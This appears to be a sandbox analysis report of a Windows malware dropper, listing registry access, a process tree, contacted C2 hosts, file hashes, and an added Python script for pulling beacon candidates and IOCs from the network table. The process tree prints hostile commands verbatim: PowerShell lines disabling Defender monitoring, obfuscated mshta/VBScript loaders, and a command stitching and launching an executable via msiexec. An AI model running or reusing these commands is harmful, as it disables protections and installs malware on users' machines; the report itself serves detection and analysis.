| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp" /SL5="$80192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe
Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe"
C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp" /SL5="$A019E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 488
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| N/A | 127.0.0.1:49277 | | tcp |
| N/A | 127.0.0.1:49279 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
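The network table above is dominated by repeated connections to a few bare IP:port pairs that never resolve from a domain (135.181.129.119:4805, 194.104.136.5:46013, 91.121.67.60:2151), which is what a polling C2 channel looks like next to the one-off lookups of pastebin.com, iplogger.org and the Microsoft CRL host. The Python below is an added example, not part of the sandbox report: it parses rows in the form the report prints them (including rows where an empty Domain cell lets the protocol slip into the wrong column), ranks bare destinations by hit count, and separates them from an allow-list of OS and sandbox plumbing. The row excerpt is copied from this report's table; the allow-list and the `min_hits` threshold are assumptions.

```python
"""Turn a sandbox network table into beacon candidates and domain IOCs.
Added example; the allow-list below is an assumption, not report data."""
from collections import Counter

# Constructed excerpt of the report's network rows, kept in the raw form
# the page shows: rows with no domain have the protocol shifted left.
ROWS = """
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| N/A | 127.0.0.1:49277 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
"""

# Assumption: OS housekeeping and the sandbox resolver, not attacker infra.
BENIGN_HOSTS = {"crl.microsoft.com", "r11.o.lencr.org", "www.microsoft.com"}
BENIGN_IPS = {"8.8.8.8"}
PROTOS = {"tcp", "udp"}


def parse_rows(text):
    """Yield (country, dest, domain, proto), tolerating rows where the
    protocol sits in the Domain column because the domain was empty."""
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3:
            continue
        country, dest = cells[0], cells[1]
        rest = [c for c in cells[2:] if c]
        proto = next((c for c in rest if c.lower() in PROTOS), "")
        domain = next((c for c in rest if c.lower() not in PROTOS), "")
        yield country, dest, domain, proto


def beacon_candidates(text, min_hits=3):
    """Return {dest: hits} for bare IP:port destinations (no resolved
    domain, not loopback, not allow-listed) seen at least min_hits times."""
    counts = Counter()
    for _country, dest, domain, _proto in parse_rows(text):
        ip = dest.rsplit(":", 1)[0]
        if domain or ip.startswith("127.") or ip in BENIGN_IPS:
            continue
        counts[dest] += 1
    return {d: n for d, n in counts.items() if n >= min_hits}


def domain_iocs(text):
    """Sorted, de-duplicated list of contacted domains off the allow-list."""
    return sorted({dom for _c, _d, dom, _p in parse_rows(text)
                   if dom and dom not in BENIGN_HOSTS})


if __name__ == "__main__":
    for dest, hits in sorted(beacon_candidates(ROWS).items(), key=lambda kv: -kv[1]):
        print(f"beacon  {dest:24} {hits} hits")
    for dom in domain_iocs(ROWS):
        print(f"domain  {dom}")
```

Feed the full table through `parse_rows` and the two repeated FI/NL destinations dominate the count; the one-hit hosts (pastebin.com, iplogger.org, the CRL and OCSP responders) are the kind of noise that should be kept out of a blocklist, which is why the allow-list is applied before counting rather than after.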
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | d0fbd06f5709db11a8b2449a1b919251 |
| SHA1 | 83f4610e15b613668b9ebad734dbc2f8fbefc614 |
| SHA256 | e94188908546b2f00a506d7596d3673b814ab62173967b3d258422877bc56f84 |
| SHA512 | c82970a78fba054ec6e9a962a43ca6fb94ddd3a0d744dd5b9d04a014f541e6da8038497c2ba15403df12600372cb624caf6e672eeac6915f680b062efeae1e8b |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA1 | 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
| SHA512 | 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2752-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-89-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2752-88-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2752-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe
